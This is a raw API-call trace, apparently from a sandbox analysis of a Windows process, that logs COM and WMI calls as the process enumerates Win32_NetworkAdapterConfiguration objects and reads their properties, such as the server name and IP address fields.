	[0068.804] IUnknown:QueryInterface (in: This=0x233e12e3190, riid=0x7ffbf57cd840*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x350199c820 | out: ppvObject=0x350199c820*=0x0) returned 0x80004002
	[0068.804] IUnknown:QueryInterface (in: This=0x233e12e3190, riid=0x7ffbf57cd2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x350199c5b8 | out: ppvObject=0x350199c5b8*=0x0) returned 0x80004002
	[0068.804] IUnknown:AddRef (This=0x233e12e3190) returned 0x3
	[0068.804] CoGetContextToken (in: pToken=0x350199c470 | out: pToken=0x350199c470) returned 0x0
	[0068.804] IUnknown:QueryInterface (in: This=0x233e12e3190, riid=0x7ffbf57cd2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199c430 | out: ppvObject=0x350199c430*=0x233e12e3198) returned 0x0
	[0068.804] IMarshal:GetUnmarshalClass (in: This=0x233e12e3198, riid=0x7ffbf57cd260, pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x350199c460 | out: pCid=0x350199c460) returned 0x0
	[0068.804] IUnknown:Release (This=0x233e12e3198) returned 0x3
	[0068.804] CoGetContextToken (in: pToken=0x350199c440 | out: pToken=0x350199c440) returned 0x0
	[0068.804] IUnknown:AddRef (This=0x233e12e3190) returned 0x4
	[0068.805] IUnknown:QueryInterface (in: This=0x233e12e3190, riid=0x7ffbf57cd280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199c558 | out: ppvObject=0x350199c558*=0x0) returned 0x80004002
	[0068.805] IUnknown:Release (This=0x233e12e3190) returned 0x3
	[0068.805] IUnknown:Release (This=0x233e12e3190) returned 0x2
	[0068.805] CoGetContextToken (in: pToken=0x350199c900 | out: pToken=0x350199c900) returned 0x0
	[0068.805] CoGetContextToken (in: pToken=0x350199c840 | out: pToken=0x350199c840) returned 0x0
	[0068.805] IUnknown:AddRef (This=0x233e12e3190) returned 0x3
	[0068.805] IUnknown:QueryInterface (in: This=0x233e12e3190, riid=0x350199c980*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x350199c960 | out: ppvObject=0x350199c960*=0x233e12e3190) returned 0x0
	[0068.805] IUnknown:Release (This=0x233e12e3190) returned 0x3
	[0068.805] IUnknown:Release (This=0x233e12e3190) returned 0x2
	[0068.805] IUnknown:Release (This=0x233e12e3190) returned 0x1
	[0068.805] CoTaskMemFree (pv=0x233fc644a20) 
	[0068.805] CoGetContextToken (in: pToken=0x350199d280 | out: pToken=0x350199d280) returned 0x0
	[0068.805] IUnknown:AddRef (This=0x233e12e3190) returned 0x2
	[0068.805] IWbemClassObject:Get (in: This=0x233e12e3190, wszName="__GENUS", lFlags=0, pVal=0x350199d3f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199d3ec*=0, plFlavor=0x350199d3e8*=0 | out: pVal=0x350199d3f0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x350199d3ec*=3, plFlavor=0x350199d3e8*=64) returned 0x0
	[0068.806] IWbemClassObject:Get (in: This=0x233e12e3190, wszName="__PATH", lFlags=0, pVal=0x350199d390*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199d38c*=0, plFlavor=0x350199d388*=0 | out: pVal=0x350199d390*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\X2VS1CUM\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=2", varVal2=0x0), pType=0x350199d38c*=8, plFlavor=0x350199d388*=64) returned 0x0
	[0068.806] SysStringLen (param_1="\\\\X2VS1CUM\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=2") returned 0x3f
	[0068.806] CoGetObjectContext (in: riid=0x350199d328*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x350199d320 | out: ppv=0x350199d320*=0x233e121be30) returned 0x0
	[0068.806] IComThreadingInfo:GetCurrentApartmentType (in: This=0x233e121be30, pAptType=0x350199d340 | out: pAptType=0x350199d340*=1) returned 0x0
	[0068.806] IUnknown:QueryInterface (in: This=0x233e121be30, riid=0x233e4523c48*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x350199d448 | out: ppvObject=0x350199d448*=0x0) returned 0x80004002
	[0068.806] IUnknown:Release (This=0x233e121be30) returned 0x2
	[0068.806] CoGetClassObject (in: rclsid=0x233fc685dd8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7ffbf57cd250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x350199c9b0 | out: ppv=0x350199c9b0*=0x233fc703d40) returned 0x0
	[0068.806] WbemDefPath:IUnknown:QueryInterface (in: This=0x233fc703d40, riid=0x7ffbf57cd2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x350199c6c0 | out: ppvObject=0x350199c6c0*=0x0) returned 0x80004002
	[0068.806] WbemDefPath:IClassFactory:CreateInstance (in: This=0x233fc703d40, pUnkOuter=0x0, riid=0x7ffbf57cd260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199c6a8 | out: ppvObject=0x350199c6a8*=0x233e3a019d0) returned 0x0
	[0068.807] IUnknown:QueryInterface (in: This=0x233e3a019d0, riid=0x7ffbf57cd260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199c5b0 | out: ppvObject=0x350199c5b0*=0x233e3a019d0) returned 0x0
	[0068.807] IUnknown:QueryInterface (in: This=0x233e3a019d0, riid=0x7ffbf57cd840*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x350199c630 | out: ppvObject=0x350199c630*=0x0) returned 0x80004002
	[0068.807] IUnknown:AddRef (This=0x233e3a019d0) returned 0x3
	[0068.807] CoGetContextToken (in: pToken=0x350199c280 | out: pToken=0x350199c280) returned 0x0
	[0068.807] IUnknown:QueryInterface (in: This=0x233e3a019d0, riid=0x7ffbf57cd2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199c240 | out: ppvObject=0x350199c240*=0x233fc7043c0) returned 0x0
	[0068.807] IMarshal:GetUnmarshalClass (in: This=0x233fc7043c0, riid=0x7ffbf57cd260, pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x350199c270 | out: pCid=0x350199c270) returned 0x0
	[0068.807] IUnknown:Release (This=0x233fc7043c0) returned 0x3
	[0068.807] CoGetContextToken (in: pToken=0x350199c250 | out: pToken=0x350199c250) returned 0x0
	[0068.807] IUnknown:AddRef (This=0x233e3a019d0) returned 0x4
	[0068.807] IUnknown:QueryInterface (in: This=0x233e3a019d0, riid=0x7ffbf57cd280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199c368 | out: ppvObject=0x350199c368*=0x0) returned 0x80004002
	[0068.808] IUnknown:Release (This=0x233e3a019d0) returned 0x3
	[0068.808] IUnknown:Release (This=0x233e3a019d0) returned 0x2
	[0068.808] WbemDefPath:IUnknown:Release (This=0x233fc703d40) returned 0x0
	[0068.808] IUnknown:Release (This=0x233e3a019d0) returned 0x1
	[0068.808] CoGetContextToken (in: pToken=0x350199cf80 | out: pToken=0x350199cf80) returned 0x0
	[0068.808] CoGetContextToken (in: pToken=0x350199cec0 | out: pToken=0x350199cec0) returned 0x0
	[0068.808] IUnknown:AddRef (This=0x233e3a019d0) returned 0x2
	[0068.808] IUnknown:QueryInterface (in: This=0x233e3a019d0, riid=0x350199d000*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x350199cfe0 | out: ppvObject=0x350199cfe0*=0x233e3a019d0) returned 0x0
	[0068.808] IUnknown:Release (This=0x233e3a019d0) returned 0x2
	[0068.809] IUnknown:Release (This=0x233e3a019d0) returned 0x1
	[0068.809] CoGetContextToken (in: pToken=0x350199d100 | out: pToken=0x350199d100) returned 0x0
	[0068.809] CoGetContextToken (in: pToken=0x350199d040 | out: pToken=0x350199d040) returned 0x0
	[0068.809] IUnknown:AddRef (This=0x233e3a019d0) returned 0x2
	[0068.809] IUnknown:QueryInterface (in: This=0x233e3a019d0, riid=0x350199d180*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x350199d160 | out: ppvObject=0x350199d160*=0x233e3a019d0) returned 0x0
	[0068.809] IUnknown:Release (This=0x233e3a019d0) returned 0x2
	[0068.809] IUnknown:AddRef (This=0x233e3a019d0) returned 0x3
	[0068.809] IWbemPath:SetText (This=0x233e3a019d0, uMode=0x4, pszPath="\\\\X2VS1CUM\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=2") returned 0x0
	[0068.809] IUnknown:Release (This=0x233e3a019d0) returned 0x2
	[0068.810] IWbemPath:GetNamespaceCount (in: This=0x233e3a02510, puCount=0x350199d3c0 | out: puCount=0x350199d3c0*=0x2) returned 0x0
	[0068.810] IWbemPath:GetText (in: This=0x233e3a02510, lFlags=4, puBuffLength=0x350199d3c0*=0x0, pszText=0x0 | out: puBuffLength=0x350199d3c0*=0x17, pszText=0x0) returned 0x0
	[0068.810] IWbemPath:GetText (in: This=0x233e3a02510, lFlags=4, puBuffLength=0x350199d3c0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x350199d3c0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0068.810] IWbemPath:GetNamespaceCount (in: This=0x233e3a02510, puCount=0x350199ce60 | out: puCount=0x350199ce60*=0x2) returned 0x0
	[0068.810] IWbemPath:GetText (in: This=0x233e3a02510, lFlags=4, puBuffLength=0x350199ce60*=0x0, pszText=0x0 | out: puBuffLength=0x350199ce60*=0x17, pszText=0x0) returned 0x0
	[0068.810] IWbemPath:GetText (in: This=0x233e3a02510, lFlags=4, puBuffLength=0x350199ce60*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x350199ce60*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0068.810] IWbemClassObject:Get (in: This=0x233e12e3190, wszName="__NAMESPACE", lFlags=0, pVal=0x350199ce50*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199ce4c*=0, plFlavor=0x350199ce48*=0 | out: pVal=0x350199ce50*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x350199ce4c*=8, plFlavor=0x350199ce48*=64) returned 0x0
	[0068.810] SysStringLen (param_1="root\\cimv2") returned 0xa
	[0068.810] IWbemClassObject:Get (in: This=0x233e12e3190, wszName="__NAMESPACE", lFlags=0, pVal=0x350199ce60*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199ce5c*=8, plFlavor=0x350199ce58*=64 | out: pVal=0x350199ce60*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x350199ce5c*=8, plFlavor=0x350199ce58*=64) returned 0x0
	[0068.810] SysStringLen (param_1="root\\cimv2") returned 0xa
	[0068.810] IWbemPath:GetNamespaceCount (in: This=0x233e3a02510, puCount=0x350199ce60 | out: puCount=0x350199ce60*=0x2) returned 0x0
	[0068.810] IWbemPath:GetText (in: This=0x233e3a02510, lFlags=4, puBuffLength=0x350199ce60*=0x0, pszText=0x0 | out: puBuffLength=0x350199ce60*=0x17, pszText=0x0) returned 0x0
	[0068.810] IWbemPath:GetText (in: This=0x233e3a02510, lFlags=4, puBuffLength=0x350199ce60*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x350199ce60*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0068.810] IWbemClassObject:Get (in: This=0x233e12e3190, wszName="__CLASS", lFlags=0, pVal=0x350199ce50*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199ce4c*=0, plFlavor=0x350199ce48*=0 | out: pVal=0x350199ce50*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_NetworkAdapterConfiguration", varVal2=0x0), pType=0x350199ce4c*=8, plFlavor=0x350199ce48*=64) returned 0x0
	[0068.810] SysStringLen (param_1="Win32_NetworkAdapterConfiguration") returned 0x21
	[0068.811] IWbemClassObject:Get (in: This=0x233e12e3190, wszName="__CLASS", lFlags=0, pVal=0x350199ce60*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199ce5c*=8, plFlavor=0x350199ce58*=64 | out: pVal=0x350199ce60*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_NetworkAdapterConfiguration", varVal2=0x0), pType=0x350199ce5c*=8, plFlavor=0x350199ce58*=64) returned 0x0
	[0068.811] SysStringLen (param_1="Win32_NetworkAdapterConfiguration") returned 0x21
	[0068.811] IWbemPath:GetNamespaceCount (in: This=0x233e3a02510, puCount=0x350199c8f0 | out: puCount=0x350199c8f0*=0x2) returned 0x0
	[0068.811] IWbemPath:GetText (in: This=0x233e3a02510, lFlags=4, puBuffLength=0x350199c8f0*=0x0, pszText=0x0 | out: puBuffLength=0x350199c8f0*=0x17, pszText=0x0) returned 0x0
	[0068.811] IWbemPath:GetText (in: This=0x233e3a02510, lFlags=4, puBuffLength=0x350199c8f0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x350199c8f0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0068.811] IWbemPath:GetNamespaceCount (in: This=0x233e3a02510, puCount=0x350199c8f0 | out: puCount=0x350199c8f0*=0x2) returned 0x0
	[0068.811] IWbemPath:GetText (in: This=0x233e3a02510, lFlags=4, puBuffLength=0x350199c8f0*=0x0, pszText=0x0 | out: puBuffLength=0x350199c8f0*=0x17, pszText=0x0) returned 0x0
	[0068.811] IWbemPath:GetText (in: This=0x233e3a02510, lFlags=4, puBuffLength=0x350199c8f0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x350199c8f0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0068.811] IWbemClassObject:GetNames (in: This=0x233e12e3190, wszQualifierName=0x0, lFlags=48, pQualifierVal=0x350199c8e8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pNames=0x350199c8e0 | out: pNames=0x350199c8e0*="\x01ƀ\x08") returned 0x0
	[0068.811] SafeArrayGetDim (psa=0x233fc684d20) returned 0x1
	[0068.811] IWbemClassObject:Get (in: This=0x233e12e3190, wszName="__GENUS", lFlags=0, pVal=0x350199c8e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199c8dc*=0, plFlavor=0x350199c8d8*=0 | out: pVal=0x350199c8e0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x350199c8dc*=3, plFlavor=0x350199c8d8*=64) returned 0x0
	[0068.811] IWbemClassObject:Get (in: This=0x233e12e3190, wszName="__CLASS", lFlags=0, pVal=0x350199c8e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199c8dc*=0, plFlavor=0x350199c8d8*=0 | out: pVal=0x350199c8e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_NetworkAdapterConfiguration", varVal2=0x0), pType=0x350199c8dc*=8, plFlavor=0x350199c8d8*=64) returned 0x0
	[0068.811] SysStringLen (param_1="Win32_NetworkAdapterConfiguration") returned 0x21
	[0068.812] IWbemClassObject:Get (in: This=0x233e12e3190, wszName="__SUPERCLASS", lFlags=0, pVal=0x350199c8e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199c8dc*=0, plFlavor=0x350199c8d8*=0 | out: pVal=0x350199c8e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CIM_Setting", varVal2=0x0), pType=0x350199c8dc*=8, plFlavor=0x350199c8d8*=64) returned 0x0
	[0068.812] SysStringLen (param_1="CIM_Setting") returned 0xb
	[0068.812] IWbemClassObject:Get (in: This=0x233e12e3190, wszName="__DYNASTY", lFlags=0, pVal=0x350199c8e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199c8dc*=0, plFlavor=0x350199c8d8*=0 | out: pVal=0x350199c8e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CIM_Setting", varVal2=0x0), pType=0x350199c8dc*=8, plFlavor=0x350199c8d8*=64) returned 0x0
	[0068.812] SysStringLen (param_1="CIM_Setting") returned 0xb
	[0068.812] IWbemClassObject:Get (in: This=0x233e12e3190, wszName="__RELPATH", lFlags=0, pVal=0x350199c8e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199c8dc*=0, plFlavor=0x350199c8d8*=0 | out: pVal=0x350199c8e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_NetworkAdapterConfiguration.Index=2", varVal2=0x0), pType=0x350199c8dc*=8, plFlavor=0x350199c8d8*=64) returned 0x0
	[0068.812] SysStringLen (param_1="Win32_NetworkAdapterConfiguration.Index=2") returned 0x29
	[0068.812] IWbemClassObject:Get (in: This=0x233e12e3190, wszName="__PROPERTY_COUNT", lFlags=0, pVal=0x350199c8e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199c8dc*=0, plFlavor=0x350199c8d8*=0 | out: pVal=0x350199c8e0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3d, varVal2=0x0), pType=0x350199c8dc*=3, plFlavor=0x350199c8d8*=64) returned 0x0
	[0068.812] IWbemClassObject:Get (in: This=0x233e12e3190, wszName="__DERIVATION", lFlags=0, pVal=0x350199c8e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199c8dc*=0, plFlavor=0x350199c8d8*=0 | out: pVal=0x350199c8e0*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233fc6848e0*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x233fc644660, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x350199c8dc*=8200, plFlavor=0x350199c8d8*=64) returned 0x0
	[0068.813] IWbemClassObject:Get (in: This=0x233e12e3190, wszName="__SERVER", lFlags=0, pVal=0x350199c8e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199c8dc*=0, plFlavor=0x350199c8d8*=0 | out: pVal=0x350199c8e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="X2VS1CUM", varVal2=0x0), pType=0x350199c8dc*=8, plFlavor=0x350199c8d8*=64) returned 0x0
	[0068.813] SysStringLen (param_1="X2VS1CUM") returned 0x8
	[0068.813] IWbemClassObject:Get (in: This=0x233e12e3190, wszName="__NAMESPACE", lFlags=0, pVal=0x350199c8e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199c8dc*=0, plFlavor=0x350199c8d8*=0 | out: pVal=0x350199c8e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x350199c8dc*=8, plFlavor=0x350199c8d8*=64) returned 0x0
	[0068.813] SysStringLen (param_1="root\\cimv2") returned 0xa
	[0068.813] IWbemClassObject:Get (in: This=0x233e12e3190, wszName="__PATH", lFlags=0, pVal=0x350199c8e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199c8dc*=0, plFlavor=0x350199c8d8*=0 | out: pVal=0x350199c8e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\X2VS1CUM\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=2", varVal2=0x0), pType=0x350199c8dc*=8, plFlavor=0x350199c8d8*=64) returned 0x0
	[0068.813] SysStringLen (param_1="\\\\X2VS1CUM\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=2") returned 0x3f
	[0068.813] IWbemPath:GetNamespaceCount (in: This=0x233e3a02510, puCount=0x350199c980 | out: puCount=0x350199c980*=0x2) returned 0x0
	[0068.813] IWbemPath:GetText (in: This=0x233e3a02510, lFlags=4, puBuffLength=0x350199c980*=0x0, pszText=0x0 | out: puBuffLength=0x350199c980*=0x17, pszText=0x0) returned 0x0
	[0068.813] IWbemPath:GetText (in: This=0x233e3a02510, lFlags=4, puBuffLength=0x350199c980*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x350199c980*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0068.813] IWbemClassObject:Get (in: This=0x233e12e3190, wszName="IPADDREss", lFlags=0, pVal=0x350199c970*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199c96c*=0, plFlavor=0x350199c968*=0 | out: pVal=0x350199c970*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199c96c*=8200, plFlavor=0x350199c968*=32) returned 0x0
	[0068.813] IWbemClassObject:Get (in: This=0x233e12e3190, wszName="IPADDREss", lFlags=0, pVal=0x350199cba0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199cb9c*=8200, plFlavor=0x350199cb98*=32 | out: pVal=0x350199cba0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199cb9c*=8200, plFlavor=0x350199cb98*=32) returned 0x0
	[0068.814] CoTaskMemAlloc (cb=0x8) returned 0x233fc644990
	[0068.814] IEnumWbemClassObject:Next (in: This=0x233fc6f4ed0, lTimeout=-1, uCount=0x1, apObjects=0x233fc644990, puReturned=0x350199d478 | out: apObjects=0x233fc644990*=0x233e12e36f0, puReturned=0x350199d478*=0x1) returned 0x0
	[0068.814] IUnknown:QueryInterface (in: This=0x233e12e36f0, riid=0x7ffbf57cd260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199c7a0 | out: ppvObject=0x350199c7a0*=0x233e12e36f0) returned 0x0
	[0068.814] IUnknown:QueryInterface (in: This=0x233e12e36f0, riid=0x7ffbf57cd840*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x350199c820 | out: ppvObject=0x350199c820*=0x0) returned 0x80004002
	[0068.814] IUnknown:QueryInterface (in: This=0x233e12e36f0, riid=0x7ffbf57cd2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x350199c5b8 | out: ppvObject=0x350199c5b8*=0x0) returned 0x80004002
	[0068.815] IUnknown:AddRef (This=0x233e12e36f0) returned 0x3
	[0068.815] CoGetContextToken (in: pToken=0x350199c470 | out: pToken=0x350199c470) returned 0x0
	[0068.815] IUnknown:QueryInterface (in: This=0x233e12e36f0, riid=0x7ffbf57cd2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199c430 | out: ppvObject=0x350199c430*=0x233e12e36f8) returned 0x0
	[0068.815] IMarshal:GetUnmarshalClass (in: This=0x233e12e36f8, riid=0x7ffbf57cd260, pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x350199c460 | out: pCid=0x350199c460) returned 0x0
	[0068.815] IUnknown:Release (This=0x233e12e36f8) returned 0x3
	[0068.815] CoGetContextToken (in: pToken=0x350199c440 | out: pToken=0x350199c440) returned 0x0
	[0068.815] IUnknown:AddRef (This=0x233e12e36f0) returned 0x4
	[0068.816] IUnknown:QueryInterface (in: This=0x233e12e36f0, riid=0x7ffbf57cd280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199c558 | out: ppvObject=0x350199c558*=0x0) returned 0x80004002
	[0068.816] IUnknown:Release (This=0x233e12e36f0) returned 0x3
	[0068.816] IUnknown:Release (This=0x233e12e36f0) returned 0x2
	[0068.816] CoGetContextToken (in: pToken=0x350199c900 | out: pToken=0x350199c900) returned 0x0
	[0068.816] CoGetContextToken (in: pToken=0x350199c840 | out: pToken=0x350199c840) returned 0x0
	[0068.816] IUnknown:AddRef (This=0x233e12e36f0) returned 0x3
	[0068.816] IUnknown:QueryInterface (in: This=0x233e12e36f0, riid=0x350199c980*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x350199c960 | out: ppvObject=0x350199c960*=0x233e12e36f0) returned 0x0
	[0068.817] IUnknown:Release (This=0x233e12e36f0) returned 0x3
	[0068.817] IUnknown:Release (This=0x233e12e36f0) returned 0x2
	[0068.817] IUnknown:Release (This=0x233e12e36f0) returned 0x1
	[0068.817] CoTaskMemFree (pv=0x233fc644990) 
	[0068.817] CoGetContextToken (in: pToken=0x350199d280 | out: pToken=0x350199d280) returned 0x0
	[0068.817] IUnknown:AddRef (This=0x233e12e36f0) returned 0x2
